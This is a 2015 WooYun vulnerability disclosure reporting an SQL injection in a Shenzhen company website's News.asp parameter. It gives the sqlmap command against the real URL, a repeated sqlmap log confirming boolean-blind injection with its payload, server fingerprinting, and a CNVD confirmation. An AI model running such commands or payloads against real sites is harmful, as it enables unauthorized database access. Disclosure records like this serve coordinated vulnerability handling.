当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129269

漏洞标题:深圳市吉顺达某页面存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: linkey

提交时间:2015-07-26 22:15

修复时间:2015-09-13 15:48

公开时间:2015-09-13 15:48

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-26: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经确认,细节仅向厂商公开
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

我现在还不想学车、会被叔叔抓的

详细说明:

还是一样如下:

python sqlmap.py -u "http://www.jishunda.cn/News.asp?xwlb_id=36" --table


得出:

[04:57:27] [INFO] testing connection to the target url
[04:57:28] [INFO] testing if the url is stable, wait a few seconds
[04:57:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:58:01] [INFO] url is stable
[04:58:01] [INFO] testing if GET parameter 'xwlb_id' is dynamic
[04:58:01] [INFO] heuristics detected web page charset 'GB2312'
[04:58:01] [INFO] confirming that GET parameter 'xwlb_id' is dynamic
[04:58:01] [WARNING] GET parameter 'xwlb_id' appears to be not dynamic
[04:58:01] [WARNING] reflective value(s) found and filtering out
[04:58:01] [INFO] heuristic test shows that GET parameter 'xwlb_id' might be injectable (possible DBMS: Microsoft Access)
[04:58:01] [INFO] testing for SQL injection on GET parameter 'xwlb_id'
[04:58:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:58:02] [INFO] GET parameter 'xwlb_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[04:58:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:58:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[04:59:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:05] [INFO] target url appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:59:40] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:41] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql) 
[04:59:41] [INFO] checking if the injection point on GET parameter 'xwlb_id' is a false positive
GET parameter 'xwlb_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:


结论:

---
Place: GET
Parameter: xwlb_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xwlb_id=36 AND 3949=3949
---
[04:59:46] [INFO] testing Microsoft Access
[05:00:10] [INFO] confirming Microsoft Access
[05:00:10] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[05:00:10] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[05:00:10] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:00:10] [INFO] retrieved: 
[05:00:10] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[05:00:10] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [ERROR] cannot retrieve table names, back-end DBMS is Access


可能还存在IIS6 的解析漏洞 工程师自己看着办

漏洞证明:

还是一样如下:

python sqlmap.py -u "http://www.jishunda.cn/News.asp?xwlb_id=36" --table


得出:

[04:57:27] [INFO] testing connection to the target url
[04:57:28] [INFO] testing if the url is stable, wait a few seconds
[04:57:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:58:01] [INFO] url is stable
[04:58:01] [INFO] testing if GET parameter 'xwlb_id' is dynamic
[04:58:01] [INFO] heuristics detected web page charset 'GB2312'
[04:58:01] [INFO] confirming that GET parameter 'xwlb_id' is dynamic
[04:58:01] [WARNING] GET parameter 'xwlb_id' appears to be not dynamic
[04:58:01] [WARNING] reflective value(s) found and filtering out
[04:58:01] [INFO] heuristic test shows that GET parameter 'xwlb_id' might be injectable (possible DBMS: Microsoft Access)
[04:58:01] [INFO] testing for SQL injection on GET parameter 'xwlb_id'
[04:58:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:58:02] [INFO] GET parameter 'xwlb_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[04:58:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:58:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[04:59:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:05] [INFO] target url appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:59:40] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:41] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql) 
[04:59:41] [INFO] checking if the injection point on GET parameter 'xwlb_id' is a false positive
GET parameter 'xwlb_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:


结论:

---
Place: GET
Parameter: xwlb_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xwlb_id=36 AND 3949=3949
---
[04:59:46] [INFO] testing Microsoft Access
[05:00:10] [INFO] confirming Microsoft Access
[05:00:10] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[05:00:10] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[05:00:10] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:00:10] [INFO] retrieved: 
[05:00:10] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[05:00:10] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [ERROR] cannot retrieve table names, back-end DBMS is Access


附上 图:

~UQ35677%4W$`3LPZ$VZQ9Y.jpg


修复方案:

过滤吧。。。工程师看着办。

版权声明:转载请注明来源 linkey@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-30 15:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续尝试协调网站管理单位处置.

最新状态:

暂无